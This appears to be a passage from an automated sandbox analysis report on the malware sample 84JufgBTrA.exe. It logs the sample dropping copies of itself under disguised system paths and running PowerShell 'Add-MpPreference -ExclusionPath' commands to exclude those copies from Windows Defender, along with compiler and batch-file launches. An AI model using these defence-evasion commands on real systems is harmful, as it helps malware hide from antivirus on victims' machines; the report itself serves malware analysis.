                      Source: C:\Users\user\Desktop\84JufgBTrA.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Recovery\RuntimeBroker.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe Thread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573155
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 573043
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572920
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572798
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572552
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572359
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572217
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 572047
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571781
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571572
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571449
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571311
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 571045
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 300000
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570935
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570827
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570717
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570609
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570499
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570390
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570264
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570156
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 570044
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569937
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569828
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569719
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569603
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569333
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 569015
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568902
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568797
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568687
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568578
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568459
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568344
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 568234
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exeThread delayed: delay time: 922337203685477
                      Source: C:\Recovery\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\Documents\desktop.ini
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppData
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppData\Local\Temp
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeFile opened: C:\Users\user\AppData\Local
                      Source: w32tm.exe, 00000024.00000002.1852433190.000002219EA87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess token adjusted: Debug
                      Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Recovery\RuntimeBroker.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Configuration\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5tsyhrw\b5tsyhrw.cmdline"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\crx\scripts\extension\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe'
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OO0he60sKA.bat"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC0BA.tmp" "c:\Windows\System32\CSCFD2815331994D75A9D1B7A464F57D19.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe "C:\Users\user\SendTo\MaEiPrsQRasQLtRzJjb.exe"
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeQueries volume information: C:\Users\user\Desktop\84JufgBTrA.exe VolumeInformation
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exeQueries volume information: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe VolumeInformation
                      Source: C:\Recovery\RuntimeBroker.exeQueries volume information: C:\Recovery\RuntimeBroker.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
